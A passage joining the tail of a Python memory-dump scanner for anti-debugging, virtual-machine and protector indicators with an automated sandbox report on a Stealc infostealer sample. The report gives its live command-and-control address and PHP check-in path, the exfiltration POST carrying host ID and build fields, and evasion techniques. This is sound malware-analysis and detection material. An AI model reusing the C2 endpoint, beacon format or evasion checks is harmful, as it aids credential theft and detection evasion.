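    "filemonclass": ("sysinternals_monitor", "Filemon window class"),
    "procmon_window_class": ("sysinternals_monitor", "Process Monitor window class"),
    "process monitor - sysinternals: www.sysinternals.com": ("sysinternals_monitor", "Process Monitor title"),
    "registry monitor - sysinternals: www.sysinternals.com": ("sysinternals_monitor", "Regmon title"),
    "file monitor - sysinternals: www.sysinternals.com": ("sysinternals_monitor", "Filemon title"),
    "ntice": ("softice", "SoftICE driver device (\\\\.\\NTICE)"),
    "sice": ("softice", "SoftICE driver device (\\\\.\\SICE)"),
    "siwvid": ("softice", "SoftICE video driver device (\\\\.\\SIWVID)"),
    "hardware\\acpi\\dsdt\\vbox__": ("vm", "VirtualBox ACPI DSDT registry key"),
    "vmwarevmware": ("vm", "VMware CPUID hypervisor vendor string"),
    "hyper-v raw": ("vm", "Hyper-V string"),
    "oreans.vxd": ("protector", "Oreans (Themida/WinLicense) driver name"),
    "software\\winlicense": ("protector", "WinLicense registry key"),
}

# Whole-token match so short names such as 'sice' do not fire inside ordinary words.
PATTERNS = {
    key: re.compile(r"(?<![A-Za-z0-9])" + re.escape(key) + r"(?![A-Za-z0-9])", re.IGNORECASE)
    for key in INDICATORS
}

# Constructed dump: a few of the strings above, narrow and wide, with filler and a
# negative control. Not taken from the sample's memory.
SAMPLE_DUMP = (
    b"\x00" * 8
    + b"ollydbg\x00"
    + b"\\\\.\\NTICE\x00"
    + b"\x00\x00" + "procmon_window_class".encode("utf-16-le") + b"\x00\x00"
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00"
    + b"Oreans.vxd\x00"
    + b"service notice.txt\x00"  # contains 'tice' and 'ice' but no indicator
)


def _views(data: bytes):
    """Yield (text, char-index -> byte-offset, is_wide) for the 8-bit view and both UTF-16LE alignments."""
    yield data.decode("latin-1"), (lambda i: i), False
    for shift in (0, 1):
        # errors="ignore" drops lone surrogates, so offsets of wide hits that follow
        # such bytes are approximate.
        yield data[shift:].decode("utf-16-le", errors="ignore"), (lambda i, s=shift: s + 2 * i), True


def scan(data: bytes) -> list:
    """Return one finding per (indicator, narrow/wide), ordered by byte offset."""
    findings, seen = [], set()
    for text, to_offset, wide in _views(data):
        for key, (category, meaning) in INDICATORS.items():
            if (key, wide) in seen:
                continue
            m = PATTERNS[key].search(text)
            if m:
                seen.add((key, wide))
                findings.append({"indicator": key, "category": category, "meaning": meaning,
                                 "offset": to_offset(m.start()), "wide": wide})
    return sorted(findings, key=lambda f: f["offset"])


def assess(findings: list) -> dict:
    """Collapse findings into the capabilities a report would flag."""
    cats = Counter(f["category"] for f in findings)
    return {
        "detects_debugger": cats["debugger"] + cats["softice"] > 0,
        "detects_sysinternals_monitors": cats["sysinternals_monitor"] > 0,
        "detects_vm": cats["vm"] > 0,
        "commercial_protector": cats["protector"] > 0,
        "by_category": dict(cats),
    }


if __name__ == "__main__":
    hits = scan(SAMPLE_DUMP)
    for h in hits:
        print(f"{h['offset']:#08x} {'wide  ' if h['wide'] else 'narrow'} {h['category']:<21} {h['indicator']}")
    print(assess(hits))
```

The scan decodes the buffer three times (8-bit, and UTF-16LE at both byte alignments) because a FindWindowW or CreateFileW argument sits in memory as a wide string that a plain byte search would miss; the whole-token anchors keep "sice" from matching inside unrelated words, which is the usual false-positive source for this indicator.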

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00F49790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00F498E0
                Source: file.exe, file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F775A8 cpuid 0_2_00F775A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00F47D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00F46BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F479E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00F479E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F47BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00F47BC0

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.f30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Antivirus detection (submitted sample):

| Source | Detection | Scanner | Label |
| --- | --- | --- | --- |
| file.exe | 43% | Virustotal | |
| file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
| file.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
URL detection:

| Source | Detection | Scanner | Label |
| --- | --- | --- | --- |
| https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
| http://185.215.113.206/6c4adf523b719729.php/ | 18% | Virustotal | |
| http://185.215.113.206/ | 19% | Virustotal | |
| http://185.215.113.206 | 19% | Virustotal | |
| http://185.215.113.206/6c4adf523b719729.php | 17% | Virustotal | |
                No contacted domains info
Contacted URLs:

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| http://185.215.113.206/6c4adf523b719729.php | true | | unknown |
| http://185.215.113.206/ | true | | unknown |
URLs from memory and binary strings:

| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| http://185.215.113.206k | file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206 | file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
| http://185.215.113.206/6c4adf523b719729.phpz | file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206/j | file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206/6c4adf523b719729.php6 | file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://185.215.113.206/6c4adf523b719729.phpv | file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown |
Contacted IPs:

| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true |
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1545099
                          Start date and time:2024-10-30 05:23:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 132
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
Context for IP 185.215.113.206:

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| 185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php |
| 185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php |
                          No context
Context for ASN WHOLESALECONNECTIONSNL:

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206 |
| WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206 |
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.962398550854708
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:2'145'792 bytes
                          MD5:0d30eb6a4023a6dce770ce3d6388cb9b
                          SHA1:83e8c18d4ad2b7c36d6699e7a9e25a7b552b9779
                          SHA256:7ea542ed634733c045e8d30777ae4f1c9a0a87d532f336158d36887483a6af7c
                          SHA512:a961fae055e2f8e69e8f0e2501b38d03282c522435e51d1a8c484c2997df0c571aae580d8c1d6e0efdf95fcd32686d0badca1a772250efc9e42941ae8eebe66f
                          SSDEEP:24576:XvSuU3nuIQzd/KBskLatstrMZ8TfmRVbV6I3Q1e+fH74mJYI64e5nNUebDks59QD:/SZHQzoBbrtWVoWQ1zVW46msDwD
                          TLSH:22A533343CA5A5A7D58C9732C868B5AF694185C27D1DC0E3759F28227EC0B24C89BBFD
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xb30000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007FAF1CBAA6CAh
                          setl byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          inc ecx
                          push bx
                          dec esi
                          dec ebp
                          das
                          xor al, 36h
                          dec edi
                          bound ecx, dword ptr [ecx+4Ah]
                          dec edx
                          insd
                          push edi
                          dec eax
                          dec eax
                          jbe 00007FAF1CBAA732h
                          push esi
                          dec edx
                          popad
                          je 00007FAF1CBAA72Bh
                          push edx
                          dec esi
                          jc 00007FAF1CBAA73Ah
                          cmp byte ptr [ebx], dh
                          push edx
                          jns 00007FAF1CBAA707h
                          or eax, 49674B0Ah
                          cmp byte ptr [edi+43h], dl
                          jnc 00007FAF1CBAA70Dh
                          bound eax, dword ptr [ecx+30h]
                          pop edx
                          inc edi
                          push esp
                          push 43473163h
                          aaa
                          push edi
                          dec esi
                          xor ebp, dword ptr [ebx+59h]
                          push edi
                          push edx
                          pop eax
                          je 00007FAF1CBAA717h
                          xor dl, byte ptr [ebx+2Bh]
                          popad
                          jne 00007FAF1CBAA70Ch
                          dec eax
                          dec ebp
                          jo 00007FAF1CBAA703h
                          xor dword ptr [edi], esi
                          inc esp
                          dec edx
                          dec ebp
                          jns 00007FAF1CBAA710h
                          insd
                          jnc 00007FAF1CBAA730h
                          aaa
                          inc esp
                          inc ecx
                          inc ebx
                          xor dl, byte ptr [ecx+4Bh]
                          inc edx
                          inc esp
                          bound esi, dword ptr [ebx]
                          or eax, 63656B0Ah
                          jno 00007FAF1CBAA718h
                          push edx
                          insb
                          js 00007FAF1CBAA731h
                          outsb
                          inc ecx
                          jno 00007FAF1CBAA712h
                          push ebp
                          inc esi
                          pop edx
                          xor eax, dword ptr [ebx+36h]
                          push eax
                          aaa
                          imul edx, dword ptr [ebx+58h], 4Eh
                          aaa
                          inc ebx
                          jbe 00007FAF1CBAA70Ch
                          dec ebx
                          js 00007FAF1CBAA703h
                          jne 00007FAF1CBAA6F1h
                          push esp
                          inc bp
                          outsb
                          inc edx
                          popad
                          dec ebx
                          insd
                          dec ebp
                          inc edi
                          xor dword ptr [ecx+36h], esp
                          push 0000004Bh
                          sub eax, dword ptr [ebp+33h]
                          jp 00007FAF1CBAA71Ch
                          dec edx
                          xor bh, byte ptr [edx+56h]
                          bound eax, dword ptr [edi+66h]
                          jbe 00007FAF1CBAA6FAh
                          dec eax
                          or eax, 506C720Ah
                          aaa
                          xor dword ptr fs:[ebp+62h], ecx
                          arpl word ptr [esi], si
                          inc esp
                          jo 00007FAF1CBAA733h
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Data directories:

| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Sections:

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| (no name) | 0x1000 | 0x2e7000 | 0x67600 | bbf51362ae54b7d4bc6166938774ce9f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| (no name) | 0x2ea000 | 0x2a4000 | 0x200 | 0cb63f75f24617813c87d6b030963539 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| xpxnzipx | 0x58e000 | 0x1a1000 | 0x1a0c00 | 6515edac222ec6fa943caa1ef1e25973 | False | 0.9946538036142771 | data | 7.952407047426657 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| atgrbfaq | 0x72f000 | 0x1000 | 0x600 | 755f7987030a9d129280ba16cd93e8fe | False | 0.5859375 | data | 5.049118087689733 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x730000 | 0x3000 | 0x2200 | a9cfc5e19dd2e366da597c35bdd01917 | False | 0.37293198529411764 | DOS executable (COM) | 3.9781735833142866 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
Imports:

| DLL | Import |
| --- | --- |
| kernel32.dll | lstrcpy |
Suricata IDS alerts:

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-10-30T05:24:04.560659+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP |
TCP packets:

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Oct 30, 2024 05:24:03.306823015 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206 |
| Oct 30, 2024 05:24:03.312283993 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5 |
| Oct 30, 2024 05:24:03.312375069 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206 |
| Oct 30, 2024 05:24:03.312542915 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206 |
| Oct 30, 2024 05:24:03.317832947 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5 |
| Oct 30, 2024 05:24:04.264756918 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5 |
| Oct 30, 2024 05:24:04.264823914 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206 |
| Oct 30, 2024 05:24:04.268095970 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206 |
| Oct 30, 2024 05:24:04.273396969 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5 |
| Oct 30, 2024 05:24:04.560555935 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5 |
| Oct 30, 2024 05:24:04.560658932 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206 |
| Oct 30, 2024 05:24:07.567754030 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206 |
HTTP sessions:

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 3628 | C:\Users\user\Desktop\file.exe |
HTTP traffic (Timestamp | Bytes transferred | Direction | Data):

Oct 30, 2024 05:24:03.312542915 CET | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Oct 30, 2024 05:24:04.264756918 CET | 203 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 04:24:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 30, 2024 05:24:04.268095970 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 39 39 44 44 31 30 46 31 33 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------AFCAAEGDBKJJKECBKFHC
Content-Disposition: form-data; name="hwid"

899DD10F13543207603164
------AFCAAEGDBKJJKECBKFHC
Content-Disposition: form-data; name="build"

tale
------AFCAAEGDBKJJKECBKFHC--

Oct 30, 2024 05:24:04.560555935 CET | 210 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 04:24:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 of the string "block")
                          Target ID:0
                          Start time:00:23:58
                          Start date:30/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0xf30000
                          File size:2'145'792 bytes
                          MD5 hash:0D30EB6A4023A6DCE770CE3D6388CB9B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:3.1%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:3.5%
                            Total number of Nodes:1327
                            Total number of Limit Nodes:24
